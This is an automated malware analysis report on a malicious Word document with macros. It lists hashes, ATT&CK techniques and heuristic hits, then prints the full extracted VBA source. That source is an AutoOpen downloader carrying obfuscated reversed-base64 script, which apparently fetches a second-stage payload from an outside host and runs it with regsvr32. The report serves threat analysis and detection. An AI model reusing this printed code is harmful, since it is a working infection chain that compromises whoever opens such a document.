Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e363c9dd95401f7f…

MALICIOUS

Office (OOXML)

79.6 KB Created: 2021-05-05 08:20:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-26
MD5: dd94b4b85a1ecb87226f1c5f178c4e18 SHA-1: 941e80009c0283aa6f125fcbd36df8ca8e4156cd SHA-256: e363c9dd95401f7fbb9e8a8f21ef0538e37295fa1def6be75f2c618a8329daee
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen subroutine that utilizes WScript.Shell to execute a command. The command is constructed by reversing the document's title property and then splitting it, with the second element being used. This indicates a macro-based downloader attempting to execute a second-stage payload. The presence of WScript.Shell and Shell() calls strongly suggests execution of arbitrary commands.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set copyDocumentTitle = ActiveDocument.BuiltInDocumentProperties("title")
Set buttonException = CreateObject("wscript.shell")
With buttonException
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set copyDocumentTitle = ActiveDocument.BuiltInDocumentProperties("title")
Set buttonException = CreateObject("wscript.shell")
With buttonException
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "varNextClass"
Sub autoopen()
lenLen
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6172 bytes
SHA-256: 41f3bc6d25fb93148c6c30573b46524d78a3c53931793a5e30224ad48c4abd14
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{28A5E9E6-9E84-4157-9E33-53539E781CE4}{D236A679-F4E4-4DD5-A3C1-AB7EA2DCC5CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set copyDocumentTitle = ActiveDocument.BuiltInDocumentProperties("title")
Set buttonException = CreateObject("wscript.shell")
With buttonException
.exec (sr(copyDocumentTitle))
End With
End Sub


Attribute VB_Name = "varNextClass"
Sub autoopen()
lenLen
End Sub
Function sr(ExNamespace)
sr = StrReverse(ExNamespace)
End Function
Sub lenLen()
Dim constBufProc As String
funcA = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ")
constBufProc = funcA(1)
Set screenTextQuery = New clearOption
screenTextQuery.classDeleteScreen constBufProc, ptrButtonArray
frm.button1_Click
End Sub

Attribute VB_Name = "storageLeftFunc"
Public Function bufferTmp(tempViewGlobal)
If (Len(tempViewGlobal) < 1024) Then
iteratorDocument = Array("<html><body><div id='content1'>fTtlc29sYy5lbGJhaXJhVmV0ZWxlREE7KTIgLCJncGoudG5lbXVnckF4b2J0c2lMeG9idHNpbFxcY2lsYnVwXFxzcmVzdVxcO", "mMiKGVsaWZvdGV2YXMuZWxiYWlyYVZldGVsZURBOyl5ZG9iZXNub3BzZXIucG1lVHBhd3MoZXRpcncuZWxiYWlyYVZldGVsZURBOzEgPSBlcHl0LmVsYmFpcmFWZXRlb", "GVEQTtuZXBvLmVsYmFpcmFWZXRlbGVEQTspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSBlbGJhaXJhVmV0ZWxlREEgcmF2eykwMDIgPT0gc3V0YXRzL", "nBtZVRwYXdzKGZpOykoZG5lcy5wbWVUcGF3czspZXNsYWYgLCJhbmk9ZGkmZVhDTGRUc3N3PWhjcmFlcyZXWXVES3M9VklCbm85T1ZjTyZaWXlQVnJwTUZ1WGY9ZmVyJ", "kxHVmZvTG9qRGh5R3g9ZGljJkNJQndWc3lpWWVrMU5lSUFXNlpwcVlXb0x4UFcxPXEmSVA2U1NteHoyYjNzZXU9cSZUV1dqem1RTWJaem9TQjFIanRCST1xJlp3RWh4P", "WRpPzd4aXBvZi80MjM2L1I1eEZHRmMxekRiQ3J5YUpIcWg4ZU9kN3RJNnNpR0JyOEtTUFRxQVZYTC9maG9SYTFqS0R2aXMyTHRNaS8xODEvc29zZ2QvbW9jLmFzZGxla", "WhzcmV0aGd1YWQvLzpwdHRoIiAsIlRFR")
End If
bufferTmp = Join(iteratorDocument, "")
End Function
Public Function titleDelete(tempViewGlobal)
If (Len(tempViewGlobal) < 1024) Then
iteratorDocument = Array("yIobmVwby5wbWVUcGF3czspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHBtZVRwYXdzIHJhdg==</div><div id='content2'>fXspY29yUHRm", "ZUxyZWZmdWIoaGN0YWN9OykiYXRoLnRuZW11Z3JBeG9idHNpTHhvYnRzaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLm5vaXRjZWxsb0NyZWRyb2J7eXJ0", "OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gbm9pdGNlbGxvQ3JlZHJvYiByYXY7KSJ0aW5JbmlndWxQLGdwai50bmVtdWdy", "QXhvYnRzaUx4b2J0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyAyM2xsZG51ciIobnVyLikibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id='c", "ontent3'></div><div id='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3'></div><scrip", "t language='javascript'>function globalValueNamespace(queryQueryPointer){return(new ActiveXObject(queryQueryPointer));}function ", "counterLocalSwap(valueViewNext){")
End If
titleDelete = Join(iteratorDocument, "")
End Function
Public Function loadProc(tempViewGlobal)
If (Len(tempViewGlobal) < 1024) Then
iteratorDocument = Array("return(variableMain.getElementById(valueViewNext).innerHTML);}function bufExceptionTable(){var leftGlobal = counterLocalSwap('ta", "ble1');var loadVbLeft = leftGlobal.toLowerCase();var listboxOptionCount = counterLocalSwap('table2');return(leftGlobal + loadVbL", "eft + listboxOptionCount);}function bufferConstStruct(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var nextRequest", "=''; var w=String.fromCharCode; var L=s.length;var sizeWPaste = libRef('tArahc');for(i=0;i<64;i++){e[bufExceptionTable()[sizeWPa", "ste](i)]=i;}for(x=0;x<L;x++){c=e[s[sizeWPaste](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(nextRequest+", "=w(a));}}return(nextRequest);};function libRef(vbQuery){return vbQuery.split('').reverse().join('');}pasteClearConst = window;va", "riableMain = document;pasteClear")
End If
loadProc = Join(iteratorDocument, "")
End Function
Public Function tempArgument(tempViewGlobal)
If (Len(tempViewGlobal) < 1024) Then
iteratorDocument = Array("Const.resizeTo(1, 1);pasteClearConst.moveTo(-100, -100);var globalListProc = variableMain.getElementById('content1').innerHTML;v", "ar copyTrustVar = variableMain.getElementById('content2').innerHTML;var globalListProc = libRef(bufferConstStruct(globalListProc", "));var copyTrustVar = libRef(bufferConstStruct(copyTrustVar));</script><script language='javascript'>function storageSizeListbox", "(tmpListRemove){var deleteGeneric = globalValueNamespace(libRef('lortnoctpircs.lortnoctpircssm'));deleteGeneric['Language'] = 'j", "script';deleteGeneric['Timeout'] = 60000;deleteGeneric['AddCode'](tmpListRemove);return(null);}</script><script language='vbscri", "pt'>Call storageSizeListbox(globalListProc) : Call storageSizeListbox(copyTrustVar)</script><script language='javascript'>pasteC", "learConst['close']();</script></")
End If
tempArgument = Join(iteratorDocument, "")
End Function
Public Function bufExceptionData(tempViewGlobal)
If (Len(tempViewGlobal) < 1024) Then
iteratorDocument = Array("body></html>")
End If
bufExceptionData = Join(iteratorDocument, "")
End Function
Function ptrButtonArray()
ptrButtonArray = bufferTmp("ames") + titleDelete("truc") + loadProc("mpCa") + tempArgument("emor") + bufExceptionData("rgum")
End Function

Attribute VB_Name = "clearOption"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function classDeleteScreen(requestExVariable As String, loadSelectPtr As String)
Open requestExVariable For Output As #1
Print #1, loadSelectPtr
Close #1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30208 bytes
SHA-256: c5214139d445b13962572ccf5a3d85ab98ed2557b5112a3c3be41e8993087934
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 7 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.